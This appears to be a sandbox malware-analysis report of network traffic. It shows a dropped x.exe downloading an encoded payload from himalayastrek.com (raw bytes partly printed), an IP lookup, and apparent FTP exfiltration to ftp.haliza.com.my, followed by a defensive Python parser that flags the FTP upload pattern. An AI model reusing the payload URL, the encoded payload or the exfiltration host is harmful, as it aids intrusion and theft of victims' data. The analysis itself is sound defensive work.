                                                                                            Oct 30, 2024 08:35:24.896512985 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.791163921 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.791393042 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.791440010 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.798177958 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798194885 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798208952 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798573017 CET5627549748110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:25.798628092 CET4974856275192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:25.832731009 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.135822058 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.136253119 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.141680956 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.478383064 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.478844881 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.484154940 CET6246649749110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:26.484241009 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.487298012 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:26.492630959 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.406430006 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.406723022 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.414047956 CET6246649749110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.414140940 CET4974962466192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.457712889 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:27.762337923 CET2149744110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:27.817055941 CET4974421192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:28.521960020 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522013903 CET4434975050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.522116899 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522207975 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.522277117 CET4434975050.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.522340059 CET49750443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.540868044 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.540918112 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:28.541008949 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.542107105 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:28.542126894 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.215665102 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.215806007 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.219444036 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.219458103 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.219779015 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.259332895 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.402861118 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.447349072 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566586971 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566616058 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566628933 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.566715002 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.566731930 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.610290051 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683175087 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683195114 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683285952 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683295012 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683307886 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683336020 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683340073 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.683356047 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.683406115 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.685308933 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.685388088 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.715882063 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.716042995 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.800309896 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.800409079 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.801245928 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.801352978 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.802164078 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.802282095 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.802952051 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.803052902 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.803956032 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.804085970 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.804897070 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.804965973 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.832775116 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.832910061 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.917181015 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.917464972 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.917738914 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.917886019 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.918204069 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.918417931 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.918910980 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:29.918998003 CET49751443192.168.2.450.116.93.185
                                                                                            Oct 30, 2024 08:35:29.919090986 CET4434975150.116.93.185192.168.2.4
                                                                                            Oct 30, 2024 08:35:39.357601881 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.357736111 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:39.363042116 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.259845018 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.260221004 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.260267973 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.265875101 CET6394049754110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.266782045 CET6394049754110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.266851902 CET4975463940192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.308031082 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.590024948 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.636121035 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.647682905 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.653620005 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.984262943 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.984822035 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.990307093 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:40.990403891 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.990443945 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:40.996068001 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.894920111 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.895308971 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.895308971 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.901073933 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901087999 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901103973 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901438951 CET6296249755110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:41.901724100 CET4975562962192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:41.948618889 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.226413965 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.226949930 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.232472897 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.556190014 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.556967974 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.562568903 CET6119549756110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:42.562688112 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.562902927 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:42.569364071 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.476490974 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.476799965 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.482424974 CET6119549756110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.482485056 CET4975661195192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.527187109 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:35:43.807782888 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:35:43.854862928 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:04.723928928 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:04.729396105 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.052964926 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.053494930 CET5002353369192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.059182882 CET5336950023110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.059283018 CET5002353369192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.059341908 CET4975321192.168.2.4110.4.45.197
                                                                                            Oct 30, 2024 08:37:05.064853907 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:05.959093094 CET2149753110.4.45.197192.168.2.4
                                                                                            Oct 30, 2024 08:37:06.011368990 CET4975321192.168.2.4110.4.45.197
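The traffic to 110.4.45.197 above has the shape of passive-mode FTP uploads: one long-lived control connection from port 49753 to port 21, and four short data connections (to server-chosen ports 63940, 62962, 61195 and 53369) each opened right after an exchange on the control channel. The Python below is an added example, not part of the Joe Sandbox report: it parses rows in the flattened form this export prints (timestamp, ports and addresses run together with no separator) and flags that control-plus-data pattern per remote host. It assumes the analysis VM is 192.168.2.4, that its outbound ports fall in the Windows dynamic range 49152-65535 (so the local side's port is always five digits), and that the peer addresses are known from the DNS answers on the page; the sample rows are copied from the table above.

```python
import re

# Constructed sample: a subset of the TCP packet rows from the report above,
# exactly as the flattened export prints them (no separators between fields).
SAMPLE_ROWS = """\
Oct 30, 2024 08:35:34.785646915 CET49752443192.168.2.4172.67.74.152
Oct 30, 2024 08:35:36.443223953 CET4975321192.168.2.4110.4.45.197
Oct 30, 2024 08:35:36.448817968 CET2149753110.4.45.197192.168.2.4
Oct 30, 2024 08:35:39.351985931 CET4975463940192.168.2.4110.4.45.197
Oct 30, 2024 08:35:39.357518911 CET6394049754110.4.45.197192.168.2.4
Oct 30, 2024 08:35:40.984822035 CET4975562962192.168.2.4110.4.45.197
Oct 30, 2024 08:35:42.556967974 CET4975661195192.168.2.4110.4.45.197
Oct 30, 2024 08:37:05.053494930 CET5002353369192.168.2.4110.4.45.197
Oct 30, 2024 08:37:06.011368990 CET4975321192.168.2.4110.4.45.197
""".splitlines()

# Assumptions: the sandbox VM address and the Windows dynamic port range.
# The peer addresses come from the DNS answers and HTTP session tables.
LOCAL_IP = "192.168.2.4"
KNOWN_IPS = {LOCAL_IP, "172.67.74.152", "110.4.45.197", "50.116.93.185", "1.1.1.1"}
EPHEMERAL_MIN = 49152

ROW_RE = re.compile(r"^(?P<ts>.+? CET)(?P<tail>[\d.]+)$")


def parse_row(line, known_ips=KNOWN_IPS, local_ip=LOCAL_IP):
    """Split one flattened row into (timestamp, sport, dport, src_ip, dst_ip).

    The export has no separators, so the two addresses are recovered by
    matching the tail against the known address set, and the ports by the
    rule that the local side's port is the five-digit ephemeral one.
    """
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    ts, tail = m.group("ts"), m.group("tail")
    pairs = [(s, d) for s in known_ips for d in known_ips
             if s != d and tail.endswith(s + d)]
    if len(pairs) != 1:
        raise ValueError(f"cannot isolate an address pair in {tail!r}")
    src, dst = pairs[0]
    ports = tail[: -len(src + dst)]
    if src == local_ip:
        sport, dport = int(ports[:5]), int(ports[5:])
        local_port = sport
    elif dst == local_ip:
        sport, dport = int(ports[:-5]), int(ports[-5:])
        local_port = dport
    else:
        raise ValueError(f"neither side is the local host: {src} -> {dst}")
    if local_port < EPHEMERAL_MIN or not (1 <= sport <= 65535 and 1 <= dport <= 65535):
        raise ValueError(f"implausible ports {sport}/{dport} in {line!r}")
    return ts, sport, dport, src, dst


def outbound_flows(rows):
    """Map (dst_ip, dst_port) -> first timestamp for connections the local host opened.

    Insertion order is the order the flows first appear in the capture.
    """
    flows = {}
    for ts, sport, dport, src, dst in (parse_row(r) for r in rows):
        if src == LOCAL_IP and (dst, dport) not in flows:
            flows[(dst, dport)] = ts
    return flows


def ftp_passive_pattern(flows, min_data_conns=2):
    """Return {host: [data ports in order]} for hosts that received an FTP
    control connection (port 21) plus several connections to distinct high
    ports: in passive mode every STOR opens a fresh data connection on a
    port the server chooses, so the count approximates the files uploaded."""
    findings = {}
    for host in {dst for dst, _ in flows}:
        ports = [p for (h, p) in flows if h == host]
        data_ports = [p for p in ports if p > 1023]
        if 21 in ports and len(data_ports) >= min_data_conns:
            findings[host] = data_ports
    return findings


if __name__ == "__main__":
    flows = outbound_flows(SAMPLE_ROWS)
    for host, ports in ftp_passive_pattern(flows).items():
        print(f"{host}: FTP control on 21, {len(ports)} data connections to {ports}")
```

The DNS answers below tie 110.4.45.197 back to ftp.haliza.com.my, so the finding can be expressed as a host name as well as an address. The same parser works on the UDP rows; only the address set changes.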
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:34:57.991049051 CET | 50062 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 08:34:57.998430967 CET | 53 | 50062 | 1.1.1.1 | 192.168.2.4
Oct 30, 2024 08:35:06.129019976 CET | 65472 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 08:35:06.136702061 CET | 53 | 65472 | 1.1.1.1 | 192.168.2.4
Oct 30, 2024 08:35:08.273344994 CET | 60798 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 08:35:08.528871059 CET | 53 | 60798 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 08:34:57.991049051 CET | 192.168.2.4 | 1.1.1.1 | 0xef98 | Standard query (0) | himalayastrek.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:06.129019976 CET | 192.168.2.4 | 1.1.1.1 | 0x714 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:08.273344994 CET | 192.168.2.4 | 1.1.1.1 | 0x9aff | Standard query (0) | ftp.haliza.com.my | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 08:34:57.998430967 CET | 1.1.1.1 | 192.168.2.4 | 0xef98 | No error (0) | himalayastrek.com | | 50.116.93.185 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:06.136702061 CET | 1.1.1.1 | 192.168.2.4 | 0x714 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:06.136702061 CET | 1.1.1.1 | 192.168.2.4 | 0x714 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:06.136702061 CET | 1.1.1.1 | 192.168.2.4 | 0x714 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:08.528871059 CET | 1.1.1.1 | 192.168.2.4 | 0x9aff | No error (0) | ftp.haliza.com.my | | 110.4.45.197 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:17.458328009 CET | 1.1.1.1 | 192.168.2.4 | 0x66fb | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:35:17.458328009 CET | 1.1.1.1 | 192.168.2.4 | 0x66fb | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                                                            • himalayastrek.com
                                                                                            • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 50.116.93.185 | 443 | 4888 | C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-30 07:34:59 UTC174OUTGET /origins/233_Cllyjbrxmng HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Accept: */*
                                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                            Host: himalayastrek.com
                                                                                            2024-10-30 07:34:59 UTC209INHTTP/1.1 200 OK
                                                                                            Date: Wed, 30 Oct 2024 07:34:59 GMT
                                                                                            Server: Apache
                                                                                            Upgrade: h2,h2c
                                                                                            Connection: Upgrade, close
                                                                                            Last-Modified: Wed, 30 Oct 2024 06:08:38 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 768392
                                                                                            2024-10-30 07:34:59 UTC7983INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 4f 45 69 49 54 48 53 63 6d 48 53 55 65 48 53 4d 55 44 68 59 56 49 52 30 62 45 68 6b 69 45 78 41 68 45 78 4d 65 49 52 41 67 4a 68 38 64 49 68 55 64 46 42 30 6e 44 67 34 69 45 42 6b 6d 4a 78 38 68 49 53 59 6a 45 52 79 6d 72 71 56 5a 49 36 65 78 53 30 34 5a 47 53 59 58 44 78 38 6c 47 68 73 55 70 71 36 6c 57 53 4f 6e 73 55 76 30 2b 35 6f 43 54 76 72 79 37 74 33 6b 35 70 6e 66 36 75 66 74 36 65 61 42 41 77 7a 74 35 64 33 70 2b 2f 69 57 37 4f 6a 74 33 4f 66 6d 6d 67 68 4f 33 2f 76 30 39 50 54 72 68 4f 54 79 39 4f 66 70 36 6f 35 51 42 4f 66 71 34 2b 6a 37 35 6f 33 35 2b 2f 62 6b 35 65 69 49 2f 77 66 6f 39 2b 37 7a 2b 50 4b 61 33 75 6a 79 2b 2f 76 6e 6d 2f 31 4c 2b 66 6e 75 36 4f 33 6d 69 50 44 78 33 2f 54 6f 39 59 4e 56 56 50 4c
                                                                                            Data Ascii: pq6lWSOnsUsOEiITHScmHSUeHSMUDhYVIR0bEhkiExAhExMeIRAgJh8dIhUdFB0nDg4iEBkmJx8hISYjERymrqVZI6exS04ZGSYXDx8lGhsUpq6lWSOnsUv0+5oCTvry7t3k5pnf6uft6eaBAwzt5d3p+/iW7Ojt3OfmmghO3/v09PTrhOTy9Ofp6o5QBOfq4+j75o35+/bk5eiI/wfo9+7z+PKa3ujy+/vnm/1L+fnu6O3miPDx3/To9YNVVPL
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 67 6c 73 44 36 46 56 69 57 31 6d 54 4d 71 73 70 62 37 34 68 51 38 71 68 52 62 48 55 66 74 70 62 38 69 55 6d 62 4d 59 74 71 30 62 61 39 55 53 6a 44 66 61 76 4c 64 30 4d 45 53 4a 34 31 7a 63 47 67 70 68 5a 68 36 56 72 6f 35 4e 35 58 56 74 37 33 52 69 37 73 63 4d 73 32 7a 58 38 44 36 4c 4f 70 35 66 6c 4a 57 70 4d 50 76 4d 39 54 74 48 64 7a 70 50 57 41 6b 64 69 2b 5a 4f 72 5a 48 31 73 55 74 56 51 59 6a 78 4f 42 46 48 62 34 45 2f 6c 55 2f 48 34 46 57 62 55 66 36 6a 38 78 76 32 64 42 4c 56 70 69 48 67 57 46 44 6f 4a 79 56 76 41 54 5a 51 69 4d 39 50 39 5a 79 74 42 4f 33 61 77 77 6a 57 73 34 48 37 50 66 53 50 2b 45 51 4e 79 43 35 41 32 70 2b 68 63 72 2f 2f 6a 4c 6c 46 6c 67 77 48 48 4e 51 54 4c 30 4c 35 77 59 79 32 36 41 66 6f 2f 6c 4b 6e 48 2f 42 64 2b 6d 79 71
                                                                                            Data Ascii: glsD6FViW1mTMqspb74hQ8qhRbHUftpb8iUmbMYtq0ba9USjDfavLd0MESJ41zcGgphZh6Vro5N5XVt73Ri7scMs2zX8D6LOp5flJWpMPvM9TtHdzpPWAkdi+ZOrZH1sUtVQYjxOBFHb4E/lU/H4FWbUf6j8xv2dBLVpiHgWFDoJyVvATZQiM9P9ZytBO3awwjWs4H7PfSP+EQNyC5A2p+hcr//jLlFlgwHHNQTL0L5wYy26Afo/lKnH/Bd+myq
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 6c 6b 32 70 75 71 4b 6a 69 42 59 4b 44 4c 4b 67 66 33 50 52 6f 58 41 64 35 2b 4d 46 4d 45 2f 32 64 4f 76 47 6f 6c 43 33 51 7a 4e 55 70 4f 6d 4e 73 4f 67 6a 2f 69 58 75 53 53 46 68 74 58 45 74 6a 78 36 32 63 54 36 7a 47 6d 68 6b 30 36 41 51 32 35 56 77 4e 6f 66 69 68 36 4a 4c 49 31 37 50 42 45 55 4e 7a 52 71 38 32 42 47 56 73 61 67 6e 6d 48 78 74 69 5a 57 30 74 46 78 71 4e 69 67 5a 6e 7a 79 31 74 4d 62 4f 2b 62 48 45 73 78 7a 50 71 52 62 56 4c 42 2b 69 32 31 42 4c 53 64 41 53 76 6d 52 62 6c 47 4a 70 63 36 31 43 61 5a 4c 71 38 61 54 47 57 7a 6d 75 49 48 61 6d 31 75 43 6c 72 4c 39 34 54 65 59 57 55 4c 6d 48 42 67 2f 30 2f 5a 4e 33 4b 69 79 2f 74 30 6e 37 62 75 72 68 36 66 53 46 52 70 38 52 54 59 6f 55 49 6e 61 33 79 47 72 79 59 66 57 42 5a 50 5a 39 68 57 33
                                                                                            Data Ascii: lk2puqKjiBYKDLKgf3PRoXAd5+MFME/2dOvGolC3QzNUpOmNsOgj/iXuSSFhtXEtjx62cT6zGmhk06AQ25VwNofih6JLI17PBEUNzRq82BGVsagnmHxtiZW0tFxqNigZnzy1tMbO+bHEsxzPqRbVLB+i21BLSdASvmRblGJpc61CaZLq8aTGWzmuIHam1uClrL94TeYWULmHBg/0/ZN3Kiy/t0n7burh6fSFRp8RTYoUIna3yGryYfWBZPZ9hW3
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 32 73 55 64 58 63 30 79 45 62 35 58 70 37 5a 52 53 5a 38 58 30 58 6b 6c 6e 4e 62 75 37 79 44 61 67 68 6c 72 48 61 73 6f 34 71 50 52 57 37 6c 78 4b 51 50 78 4a 73 57 4e 46 63 6c 67 47 36 6a 76 59 61 35 4a 31 67 70 57 79 59 78 66 74 37 79 46 64 4a 30 6d 4a 55 68 73 54 4e 39 2b 47 64 4a 2f 51 66 38 33 54 61 61 44 4e 70 70 68 33 73 6e 37 4a 78 50 34 41 54 51 65 63 48 48 5a 48 47 6a 49 6e 33 62 4a 45 70 37 55 76 38 62 6c 61 74 6d 73 65 2b 45 43 73 2b 59 75 73 47 48 36 4a 42 2f 6c 56 62 76 68 63 68 73 6a 63 56 7a 69 32 5a 51 56 79 56 72 71 34 68 43 66 6c 61 55 62 76 50 41 38 72 48 31 73 78 4a 4f 6c 33 45 73 53 4c 37 4e 2f 76 77 35 2b 66 79 49 4b 74 46 71 6e 39 39 46 6e 30 30 6b 4b 54 7a 44 74 2f 55 32 41 62 72 2b 53 6f 39 6a 62 74 44 32 46 71 38 72 71 69 6d 43
                                                                                            Data Ascii: 2sUdXc0yEb5Xp7ZRSZ8X0XklnNbu7yDaghlrHaso4qPRW7lxKQPxJsWNFclgG6jvYa5J1gpWyYxft7yFdJ0mJUhsTN9+GdJ/Qf83TaaDNpph3sn7JxP4ATQecHHZHGjIn3bJEp7Uv8blatmse+ECs+YusGH6JB/lVbvhchsjcVzi2ZQVyVrq4hCflaUbvPA8rH1sxJOl3EsSL7N/vw5+fyIKtFqn99Fn00kKTzDt/U2Abr+So9jbtD2Fq8rqimC
                                                                                            2024-10-30 07:34:59 UTC8000INData Raw: 68 51 71 2f 44 74 70 44 54 39 2f 71 6c 44 77 5a 41 77 54 78 58 66 68 41 61 51 44 62 69 48 67 32 4b 77 75 37 38 62 76 2b 65 75 70 51 6f 67 64 4b 56 6b 30 46 50 6d 46 2f 51 55 76 34 38 52 72 30 37 5a 77 2b 6e 55 52 49 6c 4b 5a 47 49 43 73 42 35 63 6e 34 56 42 41 58 31 77 6f 78 6a 59 39 45 50 54 77 63 48 62 65 32 45 39 34 46 39 48 71 44 6b 36 6d 6b 61 44 2f 47 65 47 47 44 2f 6e 76 34 59 76 77 51 62 69 6d 66 63 43 4f 39 39 52 30 71 4e 4c 43 75 51 55 78 61 73 43 42 4c 46 74 5a 31 33 71 59 4b 52 4d 79 66 43 4b 71 42 58 35 70 30 43 44 66 79 5a 56 30 57 75 48 30 6f 6c 4b 5a 50 50 55 31 59 67 56 37 39 69 4c 66 64 2b 49 7a 77 6b 61 62 38 2f 79 69 75 46 4d 32 6d 59 44 33 51 30 64 35 49 67 47 68 32 57 6b 46 69 6b 4a 4d 58 4c 78 46 76 42 31 7a 61 4b 7a 4f 2b 58 41 33
                                                                                            Data Ascii: hQq/DtpDT9/qlDwZAwTxXfhAaQDbiHg2Kwu78bv+eupQogdKVk0FPmF/QUv48Rr07Zw+nURIlKZGICsB5cn4VBAX1woxjY9EPTwcHbe2E94F9HqDk6mkaD/GeGGD/nv4YvwQbimfcCO99R0qNLCuQUxasCBLFtZ13qYKRMyfCKqBX5p0CDfyZV0WuH0olKZPPU1YgV79iLfd+Izwkab8/yiuFM2mYD3Q0d5IgGh2WkFikJMXLxFvB1zaKzO+XA3
